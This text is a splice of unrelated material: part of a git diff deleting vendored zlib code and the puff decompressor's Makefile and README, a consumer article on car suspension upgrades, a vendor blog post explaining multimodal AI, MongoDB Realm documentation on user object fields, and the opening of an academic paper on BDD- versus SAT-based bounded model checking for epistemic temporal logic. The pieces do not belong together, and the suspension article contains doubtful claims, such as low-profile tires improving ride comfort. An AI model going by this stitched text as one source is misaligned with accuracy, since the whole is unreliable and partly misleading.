-1; - Z_STREAM_ERROR = -2; - Z_DATA_ERROR = -3; - Z_MEM_ERROR = -4; - Z_BUF_ERROR = -5; - Z_VERSION_ERROR = -6; - - Z_NO_COMPRESSION = 0; - Z_BEST_SPEED = 1; - Z_BEST_COMPRESSION = 9; - Z_DEFAULT_COMPRESSION = -1; - - Z_FILTERED = 1; - Z_HUFFMAN_ONLY = 2; - Z_RLE = 3; - Z_FIXED = 4; - Z_DEFAULT_STRATEGY = 0; - - Z_BINARY = 0; - Z_TEXT = 1; - Z_ASCII = 1; - Z_UNKNOWN = 2; - - Z_DEFLATED = 8; - -(* basic functions *) -function zlibVersion: PChar; -function deflateInit(var strm: z_stream; level: Integer): Integer; -function deflate(var strm: z_stream; flush: Integer): Integer; -function deflateEnd(var strm: z_stream): Integer; -function inflateInit(var strm: z_stream): Integer; -function inflate(var strm: z_stream; flush: Integer): Integer; -function inflateEnd(var strm: z_stream): Integer; - -(* advanced functions *) -function deflateInit2(var strm: z_stream; level, method, windowBits, - memLevel, strategy: Integer): Integer; -function deflateSetDictionary(var strm: z_stream; const dictionary: PChar; - dictLength: Integer): Integer; -function deflateCopy(var dest, source: z_stream): Integer; -function deflateReset(var strm: z_stream): Integer; -function deflateParams(var strm: z_stream; level, strategy: Integer): Integer; -function deflateTune(var strm: z_stream; good_length, max_lazy, nice_length, max_chain: Integer): Integer; -function deflateBound(var strm: z_stream; sourceLen: LongInt): LongInt; -function deflatePending(var strm: z_stream; var pending: Integer; var bits: Integer): Integer; -function deflatePrime(var strm: z_stream; bits, value: Integer): Integer; -function deflateSetHeader(var strm: z_stream; head: gz_header): Integer; -function inflateInit2(var strm: z_stream; windowBits: Integer): Integer; -function inflateSetDictionary(var strm: z_stream; const dictionary: PChar; - dictLength: Integer): Integer; -function inflateSync(var strm: z_stream): Integer; -function inflateCopy(var dest, source: z_stream): Integer; -function inflateReset(var strm: z_stream): Integer; -function inflateReset2(var strm: z_stream; windowBits: Integer): Integer; -function inflatePrime(var strm: z_stream; bits, value: Integer): Integer; -function inflateMark(var strm: z_stream): LongInt; -function inflateGetHeader(var strm: z_stream; var head: gz_header): Integer; -function inflateBackInit(var strm: z_stream; - windowBits: Integer; window: PChar): Integer; -function inflateBack(var strm: z_stream; in_fn: in_func; in_desc: Pointer; - out_fn: out_func; out_desc: Pointer): Integer; -function inflateBackEnd(var strm: z_stream): Integer; -function zlibCompileFlags: LongInt; - -(* utility functions *) -function compress(dest: PChar; var destLen: LongInt; - const source: PChar; sourceLen: LongInt): Integer; -function compress2(dest: PChar; var destLen: LongInt; - const source: PChar; sourceLen: LongInt; - level: Integer): Integer; -function compressBound(sourceLen: LongInt): LongInt; -function uncompress(dest: PChar; var destLen: LongInt; - const source: PChar; sourceLen: LongInt): Integer; - -(* checksum functions *) -function adler32(adler: LongInt; const buf: PChar; len: Integer): LongInt; -function adler32_combine(adler1, adler2, len2: LongInt): LongInt; -function crc32(crc: LongInt; const buf: PChar; len: Integer): LongInt; -function crc32_combine(crc1, crc2, len2: LongInt): LongInt; - -(* various hacks, don't look :) *) -function deflateInit_(var strm: z_stream; level: Integer; - const version: PChar; stream_size: Integer): Integer; -function inflateInit_(var strm: z_stream; const version: PChar; - stream_size: Integer): Integer; -function deflateInit2_(var strm: z_stream; - level, method, windowBits, memLevel, strategy: Integer; - const version: PChar; stream_size: Integer): Integer; -function inflateInit2_(var strm: z_stream; windowBits: Integer; - const version: PChar; stream_size: Integer): Integer; -function inflateBackInit_(var strm: z_stream; - windowBits: Integer; window: PChar; - const version: PChar; stream_size: Integer): Integer; - - -implementation - -{$L adler32.obj} -{$L compress.obj} -{$L crc32.obj} -{$L deflate.obj} -{$L infback.obj} -{$L inffast.obj} -{$L inflate.obj} -{$L inftrees.obj} -{$L trees.obj} -{$L uncompr.obj} -{$L zutil.obj} - -function adler32; external; -function adler32_combine; external; -function compress; external; -function compress2; external; -function compressBound; external; -function crc32; external; -function crc32_combine; external; -function deflate; external; -function deflateBound; external; -function deflateCopy; external; -function deflateEnd; external; -function deflateInit_; external; -function deflateInit2_; external; -function deflateParams; external; -function deflatePending; external; -function deflatePrime; external; -function deflateReset; external; -function deflateSetDictionary; external; -function deflateSetHeader; external; -function deflateTune; external; -function inflate; external; -function inflateBack; external; -function inflateBackEnd; external; -function inflateBackInit_; external; -function inflateCopy; external; -function inflateEnd; external; -function inflateGetHeader; external; -function inflateInit_; external; -function inflateInit2_; external; -function inflateMark; external; -function inflatePrime; external; -function inflateReset; external; -function inflateReset2; external; -function inflateSetDictionary; external; -function inflateSync; external; -function uncompress; external; -function zlibCompileFlags; external; -function zlibVersion; external; - -function deflateInit(var strm: z_stream; level: Integer): Integer; -begin - Result := deflateInit_(strm, level, ZLIB_VERSION, sizeof(z_stream)); -end; - -function deflateInit2(var strm: z_stream; level, method, windowBits, memLevel, - strategy: Integer): Integer; -begin - Result := deflateInit2_(strm, level, method, windowBits, memLevel, strategy, - ZLIB_VERSION, sizeof(z_stream)); -end; - -function inflateInit(var strm: z_stream): Integer; -begin - Result := inflateInit_(strm, ZLIB_VERSION, sizeof(z_stream)); -end; - -function inflateInit2(var strm: z_stream; windowBits: Integer): Integer; -begin - Result := inflateInit2_(strm, windowBits, ZLIB_VERSION, sizeof(z_stream)); -end; - -function inflateBackInit(var strm: z_stream; - windowBits: Integer; window: PChar): Integer; -begin - Result := inflateBackInit_(strm, windowBits, window, - ZLIB_VERSION, sizeof(z_stream)); -end; - -function _malloc(Size: Integer): Pointer; cdecl; -begin - GetMem(Result, Size); -end; - -procedure _free(Block: Pointer); cdecl; -begin - FreeMem(Block); -end; - -procedure _memset(P: Pointer; B: Byte; count: Integer); cdecl; -begin - FillChar(P^, count, B); -end; - -procedure _memcpy(dest, source: Pointer; count: Integer); cdecl; -begin - Move(source^, dest^, count); -end; - -end. http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/Makefile ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/Makefile b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/Makefile deleted file mode 100644 index 0e2594c..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/Makefile +++ /dev/null @@ -1,42 +0,0 @@ -CFLAGS=-O - -puff: puff.o pufftest.o - -puff.o: puff.h - -pufftest.o: puff.h - -test: puff - puff zeros.raw - -puft: puff.c puff.h pufftest.o - cc -fprofile-arcs -ftest-coverage -o puft puff.c pufftest.o - -# puff full coverage test (should say 100%) -cov: puft - @rm -f *.gcov *.gcda - @puft -w zeros.raw 2>&1 | cat > /dev/null - @echo '04' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '00 00 00 00 00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 254 - @echo '00 01 00 fe ff' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '01 01 00 fe ff 0a' | xxd -r -p | puft -f 2>&1 | cat > /dev/null - @echo '02 7e ff ff' | xxd -r -p | puft 2> /dev/null || test $$? -eq 246 - @echo '02' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '04 80 49 92 24 49 92 24 0f b4 ff ff c3 04' | xxd -r -p | puft 2> /dev/null || test $$? -eq 2 - @echo '04 80 49 92 24 49 92 24 71 ff ff 93 11 00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 249 - @echo '04 c0 81 08 00 00 00 00 20 7f eb 0b 00 00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 246 - @echo '0b 00 00' | xxd -r -p | puft -f 2>&1 | cat > /dev/null - @echo '1a 07' | xxd -r -p | puft 2> /dev/null || test $$? -eq 246 - @echo '0c c0 81 00 00 00 00 00 90 ff 6b 04' | xxd -r -p | puft 2> /dev/null || test $$? -eq 245 - @puft -f zeros.raw 2>&1 | cat > /dev/null - @echo 'fc 00 00' | xxd -r -p | puft 2> /dev/null || test $$? -eq 253 - @echo '04 00 fe ff' | xxd -r -p | puft 2> /dev/null || test $$? -eq 252 - @echo '04 00 24 49' | xxd -r -p | puft 2> /dev/null || test $$? -eq 251 - @echo '04 80 49 92 24 49 92 24 0f b4 ff ff c3 84' | xxd -r -p | puft 2> /dev/null || test $$? -eq 248 - @echo '04 00 24 e9 ff ff' | xxd -r -p | puft 2> /dev/null || test $$? -eq 250 - @echo '04 00 24 e9 ff 6d' | xxd -r -p | puft 2> /dev/null || test $$? -eq 247 - @gcov -n puff.c - -clean: - rm -f puff puft *.o *.gc* http://git-wip-us.apache.org/repos/asf/incubator-corinthia/blob/1a48f7c3/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/README ---------------------------------------------------------------------- diff --git a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/README b/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/README deleted file mode 100644 index bbc4cb5..0000000 --- a/DocFormats/platform/3rdparty/zlib-1.2.8/contrib/puff/README +++ /dev/null @@ -1,63 +0,0 @@ -Puff -- A Simple Inflate -3 Mar 2003 -Mark Adler [email protected] - -What this is -- - -puff.c provides the routine puff() to decompress the deflate data format. It -does so more slowly than zlib, but the code is about one-fifth the size of the -inflate code in zlib, and written to be very easy to read. - -Why I wrote this -- - -puff.c was written to document the deflate format unambiguously, by virtue of -being working C code. It is meant to supplement RFC 1951, which formally -describes the deflate format. I have received many questions on details of the -deflate format, and I hope that reading this code will answer those questions. -puff.c is heavily commented with details of the deflate format, especially -those little nooks and cranies of the format that might not be obvious from a -specification. - -puff.c may also be useful in applications where code size or memory usage is a -very limited resource, and speed is not as important. - -How to use it -- - -Well, most likely you should just be reading puff.c and using zlib for actual -applications, but if you must ... - -Include puff.h in your code, which provides this prototype: - -int puff(unsigned char *dest, /* pointer to destination pointer */ - unsigned long *destlen, /* amount of output space */ - unsigned char *source, /* pointer to source data pointer */ - unsigned long *sourcelen); /* amount of input available */ - -Then you can call puff() to decompress a deflate stream that is in memory in -its entirety at source, to a sufficiently sized block of memory for the -decompressed data at dest. puff() is the only external symbol in puff.c The -only C library functions that puff.c needs are setjmp() and longjmp(), which -are used to simplify error checking in the code to improve readabilty. puff.c -does no memory allocation, and uses less than 2K bytes off of the stack. - -If destlen is not enough space for the uncompressed data, then inflate will -return an error without writing more than destlen bytes. Note that this means -that in order to decompress the deflate data successfully, you need to know -the size of the uncompressed data ahead of time. - -If needed, puff() can determine the size of the uncompressed data with no -output space. This is done by passing dest equal to (unsigned char *)0. Then -the initial value of *destlen is ignored and *destlen is set to the length of -the uncompressed data. So if the size of the uncompressed data is not known, -then two passes of puff() can be used--first to determine the size, and second -to do the actual inflation after allocating the appropriate memory. Not -pretty, but it works. (This is one of the reasons you should be using zlib.) - -The deflate format is self-terminating. If the deflate stream does not end -in *sourcelen bytes, puff() will return an error without reading at or past -endsource. - -On return, *sourcelen is updated to the amount of input data consumed, and -*destlen is updated to the size of the uncompressed data. See the comments -in puff.c for the possible return codes for puff(). Mime View raw message
__label__pos
0.99448
How to Improve Car Comfort with Suspension Upgrades? In the vast world of automotives, understanding the intricate dynamics of a vehicle’s suspension system can oftentimes seem overwhelming. However, you don’t need to be a mechanic or an automotive enthusiast to grasp the fundamental concepts that can help you elevate your ride’s performance and comfort. This article is a comprehensive guide that offers practical insights on how to enhance your car or truck’s solace by upgrading its suspension system. Understanding Your Vehicle’s Suspension System Before delving into the nitty-gritty of suspension upgrades, it’s essential to understand the role of a vehicle’s suspension system itself. This network of components including springs, shocks, struts, and tires works in unison to absorb bumps and vibrations from the road, providing you and your passengers with a smooth ride. It also helps in maintaining contact between the tires and the road, ensuring optimal vehicle handling and safety. Sujet a lire : What’s the Role of a Fuel Additive in Engine Care? While comfort might be the primary concern for many, a well-tuned suspension system also contributes significantly to the overall performance and handling of your vehicle. It aids in braking, maintaining road contact, and limiting the impact and wear on your vehicle. Why Upgrade the Suspension? Now, you might be wondering—why should you consider upgrading your vehicle’s suspension system? Well, a standard suspension system that comes with your car or truck is designed to provide a balance between comfort and performance. However, it may not cater to your specific needs or preferences, especially if you use your vehicle for special purposes like off-roading, towing, or racing. En parallèle : Can Upgrading Mirrors Enhance Side Visibility? Upgrading your suspension can help you customize your vehicle’s ride to your liking. Whether you want a smoother ride, better handling, increased ground clearance, or enhanced load-carrying capacity, a suspension upgrade could be the solution. Remember: The best suspension upgrade is the one that meets your unique needs and preferences. Choosing the Right Suspension Upgrade Components Choosing the right components for your suspension upgrade is crucial to achieving your desired results. Here, we’ll discuss a few key components—springs, shocks, and tires—and how choosing the right ones can help improve your vehicle’s comfort and performance. Springs Springs are instrumental in absorbing the shocks and bumps from the road. A stiffer spring will reduce body roll and improve handling but might result in a harsher ride. On the other hand, softer springs can enhance ride comfort but might compromise on handling. Therefore, you must strike a balance based on your needs. Shocks Shock absorbers, or simply shocks, dampen the movement of springs to prevent continuous bouncing after a bump. Upgrading to high-performance shocks can help improve your vehicle’s stability, handling, and comfort. Tires Tires are the only point of contact between your vehicle and the road. Therefore, they play a critical role in your vehicle’s performance and comfort. Upgrading to high-quality, comfort-oriented tires with appropriate tread patterns can significantly enhance your ride’s smoothness and comfort. The Process of Suspension Upgrades Upgrading your vehicle’s suspension is not a simple plug-and-play operation. It requires careful consideration, planning, and often professional help. It is crucial to be aware that suspension modifications can impact other aspects of your vehicle, including the alignment, braking, and stability. The process typically begins with identifying your specific needs and choosing the right components. Once you have the components, you can start with the installation process. While some upgrades like changing the springs or shocks can be done with a basic mechanic toolset, others might require professional assistance. Remember: A suspension upgrade is a significant modification and should always be done keeping safety as a priority. The Impact of Suspension Upgrades on Your Vehicle While the primary aim of a suspension upgrade is to boost comfort and performance, it’s important to note that it can also have other impacts on your vehicle. A well-executed suspension upgrade can enhance your vehicle’s look, increase its resale value, improve fuel efficiency, and even extend its longevity. However, it’s essential to remember that suspension upgrades may also come with a few downsides. For instance, they can potentially void your vehicle’s warranty, require additional maintenance, and may not always result in the expected improvement. Therefore, always carefully weigh the pros and cons before deciding to upgrade your vehicle’s suspension. In the end, whether to upgrade the suspension system of your car or truck or not is a personal decision. It largely depends on your unique needs, preferences, and budget. However, with careful planning and the right choices, suspension upgrades can indeed be a game-changer that significantly enhances your vehicle’s comfort and performance. Knowing the Types of Suspension Upgrades To fully grasp the concept of improving your car’s comfort with suspension upgrades, it’s vital to know the various types of suspension systems that you can opt for. The ideal system depends on your car type, your specific needs, and your budget. Here we highlight some of the most common suspension upgrades. Leaf Springs Leaf springs are one of the oldest types of suspension components, typically found in trucks and SUVs. They are robust and can handle heavy loads, making them ideal for off-road driving or towing. Upgrading to heavy-duty leaf springs can improve ride quality, especially when carrying heavy loads. Shock Absorbers and Struts Shock absorbers and struts are integral parts of the suspension system that help maintain ride comfort. They minimize the impact of road irregularities, thereby enhancing the driving experience. Upgrading to high-performance shocks and struts can provide better vehicle stability and improved ride comfort. Lowering Springs and Air Suspension Lowering springs and air suspension systems can alter your vehicle’s ride height. Lowering springs reduce the center of gravity, improving handling and giving your car a sporty look. On the other hand, air suspension allows you to adjust the ride height as per your preference, offering superior ride quality. Sway Bars Sway bars, also known as anti-roll bars, are used to reduce body roll during cornering. Upgrading to adjustable sway bars can help fine-tune your vehicle’s handling characteristics, thereby enhancing your driving experience. Tires As mentioned before, high-quality, low-profile tires with suitable tread patterns can vastly improve your ride’s comfort. When upgrading your car suspension, remember: Each upgrade should align with your specific needs and preferences to ensure an enhanced driving experience. Conclusion: Is a Suspension Upgrade Worth It? To wrap up, improving your car’s comfort with suspension upgrades involves understanding your vehicle’s suspension system, identifying your specific needs, choosing the right components, and installing them correctly. From leaf springs to shocks and struts, to lowering springs and air suspension, to sway bars and low-profile tires, the options are vast and varied. The benefits of a suspension upgrade can be significant, including improved ride quality, better handling, increased ground clearance, and greater load-carrying capacity. Additionally, it can enhance your vehicle’s aesthetics, boost its resale value, and potentially improve fuel efficiency. But it’s also important to be aware of the potential downsides, such as the risk of voiding the vehicle’s warranty or necessitating additional maintenance. As is with all significant modifications, a suspension upgrade deserves careful consideration and planning. In the end, the decision to upgrade your vehicle’s suspension is a personal one, largely dependent on your unique needs, preferences, and budget. However, with meticulous planning and the right choices, a suspension upgrade can indeed significantly elevate your driving experience. In conclusion, it’s safe to say that Upgrading your vehicle’s suspension can significantly improve its comfort and performance, but it should be done wisely and responsibly.
__label__pos
0.934643
Navigation User Objects On this page • Overview • Schema • Summary MongoDB Realm represents each application user internally with a User Object that includes a unique ID and additional metadata that describes the user. You can access user objects in the following ways: User objects have the following form: { "id": "<Unique User ID>", "type": "<User Type>", "data": { "<Metadata Field>": <Value>, ... }, "custom_data": { "<Custom Data Field>": <Value>, ... }, "identities": [ { "id": <Unique Identity ID>, "provider_type": "<Authentication Provider>", "data": { "<Metadata Field>": <Value>, ... } } ] } Field Type Description id string A string representation of the ObjectId that uniquely identifies the user. type string The type of the user. The following types are possible: Type Description "normal" The user is an application user logged in through an authentication provider other than the API Key provider. "server" The user is a server process logged in with any type of Realm API Key. "system" The user is the system user that bypasses all rules. data document A document that contains metadata that describes the user. This field combines the data for all identities associated with the user, so the exact field names and values depend on which authentication providers the user has authenticated with. Note System Functions Have No User Data In system functions, the user.data object is empty. Use context.runningAsSystem() to test if the function is running as a system user. custom_data document A document from your application's custom user data collection that specifies the user's ID. You can use the custom user data collection to store arbitrary data about your application's users. If you set the name field, Realm populates the username metadata field with the return value of name. Realm automatically fetches a new copy of the data whenever a user refreshes their access token, such as when they log in. The underlying data is a regular MongoDB document, so you can use standard CRUD operations through the MongoDB Atlas service to define and modify the user's custom data. Note Avoid Storing Large Custom User Data Custom user data is limited to 16MB, the maximum size of a MongoDB document. To avoid hitting this limit, consider storing small and relatively static user data in each custom user data document, such as the user's preferred language or the URL of their avatar image. For data that is large, unbounded, or frequently updated, consider only storing a reference to the data in the custom user document or storing the data with a reference to the user's ID rather than in the custom user document. identities array A list of authentication provider identities associated with the user. When a user first logs in with a specific provider, Realm associates the user with an identity object that contains a unique identifier and additional metadata about the user from the provider. For subsequent logins, Realm refreshes the existing identity data but does not create a new identity. Identity objects have the following form: { "id": "<Unique ID>", "provider_type": "<Provider Name>", "data": { "<Metadata Field>": <Value>, ... } } Field Name Description id A provider-generated string that uniquely identifies this identity provider_type The type of authentication provider associated with this identity. data Additional metadata from the authentication provider that describes the user. The exact field names and values will vary depending on which authentication providers the user has logged in with. For a provider-specific breakdown of user identity data, see User Metadata. Note In general, MongoDB Realm creates a user object for a given user the first time that they authenticate. If you create a test Email/Password user through the Realm UI, Realm creates that user's user object immediately. • The user object contains relevant information about the user that you can use in your app logic. • The exact information contained in the user object depends on the authentication providers used. Give Feedback On this page • Overview • Schema • Summary
__label__pos
0.799054
Scale customer reach and grow sales with AskHandle chatbot What Is Multimodal In AI Training? What is multimodal AI? It's an intriguing concept in the field of artificial intelligence, focusing on teaching AI systems to comprehend and analyze diverse forms of data. This data spans across different mediums such as text, images, audio, and video. The goal? To develop AI that can mimic human cognition, enabling it to perceive, learn, and interpret the world in a more holistic manner. image-1 Written by Published onMay 17, 2024 RSS Feed for BlogRSS Blog What Is Multimodal In AI Training? What is multimodal AI? It's an intriguing concept in the field of artificial intelligence, focusing on teaching AI systems to comprehend and analyze diverse forms of data. This data spans across different mediums such as text, images, audio, and video. The goal? To develop AI that can mimic human cognition, enabling it to perceive, learn, and interpret the world in a more holistic manner. Imagine a person learning about cats. They might read about cats, look at pictures, listen to the sounds cats make, and watch videos of cats in action. All these different pieces of information help the person understand what a cat is. Multimodal AI training aims to achieve a similar level of understanding by combining different forms of data. Why Do We Need Multimodal AI? Single-modality AI systems, which only use one type of data, can be quite limited. For instance, a text-based AI might not understand the context of an image, and an image-based AI might miss the nuances of speech. Multimodal AI offers a richer, more comprehensive understanding by using multiple data sources. This can significantly enhance the abilities of AI systems in various applications. • Better Comprehension: Multimodal AI can comprehend information that single-mode systems might miss. For example, a multimodal AI can read an article, recognize related images, and connect them to videos, offering a holistic view of the content. • Contextual Awareness: By processing various types of data simultaneously, multimodal AI can understand context better. This can be particularly useful in applications like virtual assistants and customer service bots. • Enhanced User Experience: Systems like Google Assistant and Amazon Alexa greatly benefit from multimodal training. They can interpret voice commands, process textual information, and respond more accurately because they understand multiple types of input. Examples of Multimodal AI Many major companies are working on multimodal AI. Let's look at some real-life examples. 1. Google Google is heavily invested in multimodal AI. One of its most impressive feats is combining image recognition with text analysis. For instance, Google Photos can identify people, places, and things in your pictures. When combined with Google Search, this technology can provide a comprehensive search experience, linking related articles, images, and videos. 2. OpenAI OpenAI, known for its language model called GPT-3, is exploring the possibilities of multimodal AI as well. They're investigating how combining text with other data types can create more intelligent and useful systems. Imagine asking a virtual assistant to analyze a chart in a document while also generating a summary of the surrounding text. This dual capability can be extremely powerful for business applications. Learn more about OpenAI at OpenAI. 3. Facebook AI Research Facebook AI Research (FAIR) is another key player in this field. Their work in understanding the connections between text and images aims to improve user interaction on platforms like Facebook and Instagram. By integrating visual and textual data, they can create more meaningful user experiences, such as auto-captioning pictures or suggesting relevant hashtags. Visit Facebook AI Research at FAIR. How Does Multimodal AI Training Work? Training a multimodal AI system involves several steps. Let’s break it down: 1. Data Collection: The first step is gathering a diverse set of data. This could include text, images, videos, and audio recordings. The data must be relevant and representative of the tasks the AI will perform. 2. Preprocessing: Before feeding the data into the AI model, it needs to be cleaned and organized. This might include removing noise from audio recordings, aligning text with images, or breaking videos into manageable segments. 3. Feature Extraction: This is the process of identifying unique characteristics in the data. For text, it might involve extracting keywords. For images, it might mean identifying shapes and colors. For audio, it can be recognizing pitch and tone. 4. Model Integration: The different types of data are then fed into an AI model. Advanced machine learning techniques, such as neural networks, help the model learn patterns and relationships across the different modalities. 5. Training: The AI system undergoes rigorous training, where it processes vast amounts of multimodal data. It learns to recognize connections and make predictions based on the integrated information. 6. Evaluation: Finally, the model is tested to see how well it performs. This might involve real-world tasks or simulations to ensure it can handle the complexity of multimodal data. Challenges in Multimodal AI Training There are several challenges in multimodal AI training that researchers and AI developers are working to overcome. • Data Alignment: Matching data from different modalities can be tricky. For example, aligning the text from a lecture with the corresponding slides and audio is not straightforward. • Computational Resources: Multimodal training requires significant computational power. Training an AI model to process text, images, video, and audio simultaneously is resource-intensive and time-consuming. • Context Understanding: Even with multimodal data, understanding context is a complex task. Differentiating between sarcasm and sincerity in text, based on complementary images or videos, is a current research challenge. • Data Quality: Ensuring the quality and accuracy of the diverse data types is crucial. Inconsistent or erroneous data can lead to incorrect AI training outcomes. The Future of Multimodal AI The potential for multimodal AI is vast and exciting. As technology advances, these systems will become more sophisticated and integrated into everyday life. We can expect more intuitive virtual assistants, smarter customer service bots, and even better tools for education and healthcare. Imagine a future where an AI tutor can teach you a foreign language by showing pictures, playing audio clips, and displaying relevant text and videos. Or consider AI in healthcare, where doctors can receive comprehensive analysis combining patient records, imaging data, and genetic information to make better diagnostic decisions. The journey of multimodal AI is just beginning, and the future holds incredible promise. As researchers and technology companies continue to innovate, the capabilities of AI systems will only grow more unified and intelligent. MultimodalAI trainingAI Create personalized AI to support your customers Get Started with AskHandle today and launch your personalized AI for FREE Featured posts Join our newsletter Receive the latest releases and tips, interesting stories, and best practices in your inbox. Read about our privacy policy. Be part of the future with AskHandle. Join companies worldwide that are automating customer support with AskHandle. Embrace the future of customer support and sign up for free. Latest posts AskHandle Blog Ideas, tips, guides, interviews, industry best practices, and news. View all posts
__label__pos
0.999682
Autonomous Agents and Multi-Agent Systems , Volume 28, Issue 4, pp 558–604 | Cite as BDD-versus SAT-based bounded model checking for the existential fragment of linear temporal logic with knowledge: algorithms and their performance • Artur Mȩski • Wojciech Penczek • Maciej Szreter • Bożena Woźna-Szcześniak • Andrzej Zbrzezny Open Access Article Abstract The paper deals with symbolic approaches to bounded model checking (BMC) for the existential fragment of linear temporal logic extended with the epistemic component (ELTLK), interpreted over interleaved interpreted systems. Two translations of BMC for ELTLK to SAT and to operations on BDDs are presented. The translations have been implemented, tested, and compared with each other as well as with another tool on several benchmarks for MAS. Our experimental results reveal advantages and disadvantages of SAT- versus BDD-based BMC for ELTLK. Keywords Bounded model checking Binary decision diagrams Propositional satisfiability problem (SAT) Interpreted systems  Interleaved interpreted systems Epistemic linear temporal logic  1 Introduction Verification of multi-agent systems (MAS) is an actively developing field of research [7, 8, 14, 24, 25, 30, 47]. Several approaches based on model checking [12, 48] have been put forward for the verification of MAS. Typically, they employ combinations of the epistemic logic with either branching [8, 30, 43] or linear time temporal logic [17, 22, 38]. Some approaches reduce the verification problem to the one for plain temporal logic [6, 22], while others treat typical MAS modalities such as (distributed, common) knowledge as first-class citizens and introduce novel algorithms for them [38, 43]. In an attempt to alleviate the state-space explosion problem (i.e., an exponential growth of the system state space with the number of the agents) two main approaches have been proposed based on combining bounded model checking (BMC) with symbolic verification using translations to either ordered binary decision diagrams (BDDs) [26] or propositional logic (SAT) [41]. However, the above approaches deal with the properties expressed in the existential fragment of CTLK (i.e., CTL extended with the existential epistemic components, called ECTLK) only. In the paper [46] a method for model checking LTLK formulae using BDDs is described, but it is not explained how it can be used for BMC. In this paper we aim at completing the picture of applying the BMC-based symbolic verification to MAS by looking at the existential fragment of LTLK (i.e., LTL extended with the existential epistemic components, called ELTLK), interpreted over both the subclass of interpreted systems (IS) called interleaved interpreted systems (IIS) [31] and interpreted systems themselves. IIS are an asynchronous subclass of interpreted systems [16] in which only one action at a time is performed in a global transition. Our original contribution consists in defining the following four novel bounded model checking methods for ELTLK: the SAT-based BMC for IS and for IIS, and the BDD-based BMC for IS and for IIS. Moreover, we would like to point out that the proposed SAT-based BMC for ELTLK and for IS has never been defined and experimentally evaluated before. Next, both the presented BDD-based methods have been published earlier, but only in the informal proceedings of the LAM’2012 workshop. All the proposed BMC methods have been implemented as prototype modules of Verics [28], tested, and compared with each other as well as with MCK [17] on three well-known benchmarks for MAS: a (faulty) train controller system [21], a (faulty) generic pipeline paradigm [40], and the dining cryptographers [10]. Our experimental results reveal not only advantages and disadvantages of ELTLK SAT- versus BDD-based BMC for MAS that are consistent with comparisons for temporal logics [9, 13], but also show two novel findings. Namely, IIS semantics can improve the practical applicability of BMC, and the BDD-based approach appears to be superior for IIS semantics, while the SAT-based approach appears to be superior for IS semantics. The rest of the paper is organised as follows. In Sect. 2 we recall interpreted systems (IS), interleaved interpreted systems (IIS), the logic LTLK, and its two subsets: LTL and ELTLK (i.e., the existential fragment of LTLK). Section 3 deals with Bounded Model Checking (BMC), where Sect. 3.1 describes BDD-based BMC for ELTLK and Sect. 3.2 presents SAT-based BMC for ELTLK. In the last section we discuss our experimental results and conclude the paper. 1.1 Related work Model checking of knowledge properties was first considered by Vardi and Halpern [20]. The complexity of the model checking problem for LTL combined with epistemic modalities in the perfect recall semantics was studied by van der Meyden and Shilov [38]. Raimondi et al. showed a BDD-based method for model checking CTLK[43]. Su et al [46]. described a method for model checking LTLK formulae using BDDs. Hoek et al. [22] proposed a method for model checking LTLK formulae using the logic of local propositions. The origins of bounded model checking (BMC) go back to the seminal papers [4] and [3], where the method has been defined for the LTL properties and Boolean circuits. The main motivation of defining BMC was to take advantage of the immense success of SAT-solvers (i.e., tools implementing algorithms solving the satisfiability problem for propositional formulas). The first SAT-based BMC method for MAS was proposed in [41]. It deals with the existential fragment of the branching time logic extended with the epistemic components (ECTLK) and the interpreted systems. An implementation and experimental evaluation of this BMC method for the interleaved interpreted systems have been presented in [29]. For the same logic and for the standard interpreted systems, Jones et al. proposed a BMC method based on BDDs [26]. In [53] the SAT-based BMC method for the existential fragment of RTCTL augmented to include epistemic modalities (RTECTLK) and for the interleaved interpreted systems was introduced and experimentally evaluated. This BMC encoding takes into account the substantial improvement of the BMC encoding for ECTL that has been defined in [54]. Further, since RTECTLK is an extension of ECTLK such that a range of every temporal operator can be bounded, the BMC encoding of [53] substantially improves the BMC encoding presented in [29, 41]. In [37] a BDD-based BMC method for RTECTLK over interleaved interpreted systems was defined and compared to the corresponding SAT-based BMC method. Further, in [49] the SAT-based BMC method for the deontic interpreted systems and for ECTLK extended to include the existential deontic modalities was defined. A more efficient translation to SAT together with an implementation and an experimental evaluation of this BMC method are shown in [51], where the SAT-based BMC method for RTECTLK augmented to include the existential deontic modalities was defined. In [23] a new SAT-based BMC encoding for fair ECTLK was presented. Next, in [32] the SAT-based BMC method for the real-time interpreted systems and for the existential fragment of TCTL extend to include epistemic modalities was shown. All the above BMC approaches deal with the properties expressed in the existential fragments of branching time temporal logics only. For the linear time temporal-epistemic properties, until now, the following BMC methods have been developed. In [42] a SAT-based BMC method for ELTLK over interleaved interpreted systems has been defined. The main difficulty in the extension of the SAT-based BMC method for ELTL to the properties expressible in ELTLK was in the encoding of the looping conditions. This difficulty arises from the fact that in SAT-based BMC for ELTLK we need to consider more than one path. The BMC encoding presented in [42] is not based on the state-of-the-art BMC method for \(\mathrm{ECTL}^{*}\)  [55], which uses a reduced number of paths and a more efficient encoding of loops, what results in significantly smaller and less complicated propositional formulae that encode the ELTLK properties. For the same logic over the same systems, in [33] a BDD-based BMC method was introduced. Next, in [52] a SAT-based BMC method for the existential fragment of Metric LTL with epistemic and deontic modalities (EMTLKD) over deontic interleaved interpreted systems was defined. The usefulness of SAT-based BMC for error tracking and complementarity to the BDD-based symbolic model checking have already been proven in several works, e.g., [9, 13, 35, 36]. Further, in [34] the semantics of interpreted systems and interleaved interpreted systems were experimentally evaluated by means of the BDD-based BMC method for LTLK. Partial-order reductions for model checking of interleaved interpreted systems were presented in [31]. Table 1 provides a summary of the existing implementations of model checking techniques for MAS in the BMC context. Table 2 summarises the existing BMC techniques for MAS. Table 1 Summary of the tools and model checking techniques 